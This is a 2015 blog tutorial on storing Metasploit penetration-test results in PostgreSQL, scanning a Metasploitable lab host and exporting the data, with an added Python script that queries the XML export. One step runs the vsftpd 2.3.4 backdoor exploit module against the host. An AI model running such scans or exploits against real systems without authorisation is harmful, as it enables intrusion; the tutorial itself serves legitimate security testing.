Wednesday 17 June 2015

Metasploit: Using the database to store results


It is always a better approach to store the results of a penetration test in a database. This builds a knowledge base about the hosts scanned, the services running on them, and the vulnerabilities found, which can be queried, exported and re-used later instead of re-scanning. Metasploit uses PostgreSQL as its default database.


1) Start the PostgreSQL and Metasploit services. (The `metasploit` init script shown below belongs to the Kali release of the time; current Kali releases create the database and its user with `msfdb init` instead.)
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start the Metasploit console.
root@kali:~# msfconsole
msf >


3) Check the database status. The console must report a connection before any of the db_ commands will store anything.
msf > db_status
[*] postgresql connected to msf3


4) Run an nmap scan through `db_nmap`, Metasploit's wrapper around nmap. It runs the scan with the options you give it and imports every host, port and service banner it finds into the database, so the results are available to the `hosts` and `services` commands and to any module that reads targets from the database.
msf > db_nmap -sV 192.168.122.73
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 11:12 IST
[*] Nmap: Nmap scan report for 192.168.122.73
[*] Nmap: Host is up (0.00030s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec?
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open  shell       Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 66.26 seconds
msf >

Run an OS-detection scan as well (its output is omitted here). The result fills the os_name and os_sp columns of the hosts table.
msf > db_nmap -O 192.168.122.73


5) Verify the hosts recorded in the database. The mac column comes from the first scan and the OS columns from the -O scan.
msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.122.73  00:0c:29:fa:dd:2a        Linux               2.6.X  server      


6) View the services found on the hosts. Note that the `name` column here reflects the standard name registered for the port rather than the service nmap actually fingerprinted (compare 514, 1524, 2121 and 8180 with the nmap output above); rely on the `info` column, which carries the detected banner, when deciding what is really listening.
msf > services

Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.122.73  21    tcp    ftp           open   vsftpd 2.3.4
192.168.122.73  22    tcp    ssh           open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.122.73  23    tcp    telnet        open   Linux telnetd
192.168.122.73  25    tcp    smtp          open   Postfix smtpd
192.168.122.73  53    tcp    domain        open   ISC BIND 9.4.2
192.168.122.73  80    tcp    http          open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.122.73  111   tcp    rpcbind       open   2 RPC #100000
192.168.122.73  139   tcp    netbios-ssn   open   Samba smbd 3.X workgroup: WORKGROUP
192.168.122.73  445   tcp    microsoft-ds  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.122.73  512   tcp    exec          open  
192.168.122.73  513   tcp    login         open  
192.168.122.73  514   tcp    shell         open  
192.168.122.73  1099  tcp    rmiregistry   open   GNU Classpath grmiregistry
192.168.122.73  1524  tcp    ingreslock    open   Metasploitable root shell
192.168.122.73  2049  tcp    nfs           open   2-4 RPC #100003
192.168.122.73  2121  tcp    ccproxy-ftp   open   ProFTPD 1.3.1
192.168.122.73  3306  tcp    mysql         open   MySQL 5.0.51a-3ubuntu5
192.168.122.73  5432  tcp    postgresql    open   PostgreSQL DB 8.3.0 - 8.3.7
192.168.122.73  5900  tcp    vnc           open   VNC protocol 3.3
192.168.122.73  6000  tcp    x11           open   access denied
192.168.122.73  6667  tcp    irc           open   Unreal ircd
192.168.122.73  8009  tcp    ajp13         open   Apache Jserv Protocol v1.3
192.168.122.73  8180  tcp    unknown       open   Apache Tomcat/Coyote JSP engine 1.1

msf >

7) Find and exploit the vsftpd vulnerability. The `info` column for port 21 reads vsftpd 2.3.4, the release that shipped with a backdoor; `search` locates the matching module, and running it against the host records the outcome in the database.
msf > search vsftpd
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.122.73
msf exploit(vsftpd_234_backdoor) > exploit


8) View the vulnerabilities recorded in the database. A successful exploit run is logged automatically as a vuln entry against the host, together with the module's references, so nothing has to be entered by hand.
msf > vulns
[*] Time: 2015-06-17 06:42:50 UTC Vuln: host=192.168.122.73 name=VSFTPD v2.3.4 Backdoor Command Execution refs=OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html



9) Generate an XML report. `db_export` dumps the current workspace (here `default`); `db_import` loads such a file back into another Metasploit instance, and `workspace -a <name>` keeps separate engagements apart in the same database. The export contains everything the workspace holds, including any credentials gathered later in the engagement, so treat the file as sensitive.
msf > db_export -f xml /root/report.xml
[*] Starting export of workspace default to /root/report.xml [ xml ]...
[*]     >> Starting export of report
[*]     >> Starting export of hosts
[*]     >> Starting export of events
[*]     >> Starting export of services
[*]     >> Starting export of web sites
[*]     >> Starting export of web pages
[*]     >> Starting export of web forms
[*]     >> Starting export of web vulns
[*]     >> Starting export of module details
[*]     >> Finished export of report
[*] Finished export of workspace default to /root/report.xml [ xml ]...
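The exported report is what makes the stored results worth keeping: they can be queried without re-scanning the target. The script below is an added example, not code from the original post or from the Metasploit project. It parses a db_export XML file with Python's standard xml.etree, summarises each host's OS, services and recorded vulns, and then runs two queries over the stored data: one for service banners matching a version pattern, one for open services on cleartext-credential protocols. The embedded SAMPLE_REPORT is a constructed, trimmed report for the host scanned above; its element names (host/address, services/service/port, vulns/vuln/refs/ref) follow the MetasploitV4/V5 export layout as I know it and are an assumption to check against a real report.xml. The function names and the CLEARTEXT set are mine.

```python
"""Query a Metasploit db_export XML report offline (added example)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed report.xml for the host scanned above.
# Element names are an assumption about the MetasploitV4/V5 export layout;
# check them against a real export before relying on this parser.
SAMPLE_REPORT = """<?xml version="1.0"?>
<MetasploitV5>
  <generated time="2015-06-17 06:45:00 UTC" user="root" project="default" product="framework"/>
  <hosts>
    <host>
      <id>1</id>
      <address>192.168.122.73</address>
      <mac>00:0c:29:fa:dd:2a</mac>
      <name/>
      <state>alive</state>
      <os-name>Linux</os-name>
      <os-sp>2.6.X</os-sp>
      <purpose>server</purpose>
      <services>
        <service><id>1</id><port>21</port><proto>tcp</proto><state>open</state><name>ftp</name><info>vsftpd 2.3.4</info></service>
        <service><id>2</id><port>22</port><proto>tcp</proto><state>open</state><name>ssh</name><info>OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0</info></service>
        <service><id>3</id><port>23</port><proto>tcp</proto><state>open</state><name>telnet</name><info>Linux telnetd</info></service>
        <service><id>4</id><port>1524</port><proto>tcp</proto><state>open</state><name>ingreslock</name><info>Metasploitable root shell</info></service>
      </services>
      <vulns>
        <vuln>
          <id>1</id><host-id>1</host-id><service-id>1</service-id>
          <name>VSFTPD v2.3.4 Backdoor Command Execution</name>
          <refs><ref>OSVDB-73573</ref><ref>URL-http://pastebin.com/AetT9sS5</ref></refs>
        </vuln>
      </vulns>
    </host>
  </hosts>
</MetasploitV5>
"""

# Service names (as Metasploit records them) whose protocols send
# credentials unencrypted. My own list, extend it for your environment.
CLEARTEXT = {"ftp", "telnet", "login", "exec", "shell", "pop3", "imap", "http"}


def _text(elem, tag, default=""):
    """Text of a direct child element, stripped, or default if absent or empty."""
    child = elem.find(tag)
    if child is None or child.text is None:
        return default
    return child.text.strip()


def parse_report(xml_text):
    """Map each host address to its OS string, service list and recorded vulns."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.iter("host"):
        services = [{
            "port": int(_text(svc, "port", "0")),
            "proto": _text(svc, "proto"),
            "state": _text(svc, "state"),
            "name": _text(svc, "name"),
            "info": _text(svc, "info"),
        } for svc in host.iter("service")]
        vulns = [{
            "name": _text(vuln, "name"),
            "refs": [r.text.strip() for r in vuln.iter("ref") if r.text],
        } for vuln in host.iter("vuln")]
        os_parts = [p for p in (_text(host, "os-name"), _text(host, "os-sp")) if p]
        hosts[_text(host, "address")] = {
            "os": " ".join(os_parts),
            "services": services,
            "vulns": vulns,
        }
    return hosts


def match_banner(hosts, pattern):
    """(address, port) of every service whose stored banner matches the regex."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [(addr, s["port"]) for addr, h in hosts.items()
            for s in h["services"] if rx.search(s["info"])]


def cleartext_services(hosts):
    """(address, port, name) of open services on cleartext-credential protocols."""
    return [(addr, s["port"], s["name"]) for addr, h in hosts.items()
            for s in h["services"]
            if s["state"] == "open" and s["name"] in CLEARTEXT]


if __name__ == "__main__":
    import sys
    # Pass a real report.xml on the command line, or fall back to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    db = parse_report(text)
    for addr, h in db.items():
        print(f"{addr} ({h['os']}): {len(h['services'])} services, {len(h['vulns'])} vulns")
        for v in h["vulns"]:
            print("  vuln:", v["name"], ",".join(v["refs"]))
    print("vsftpd 2.3.4 seen on:", match_banner(db, r"vsftpd 2\.3\.4"))
    print("cleartext protocols:", cleartext_services(db))
```

Run it as `python3 query_report.py /root/report.xml` against a real export. The banner query is the point of keeping the database: when a new advisory names a version string, one regex over the stored `info` column tells you which hosts from past engagements were running it, without touching the network again.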



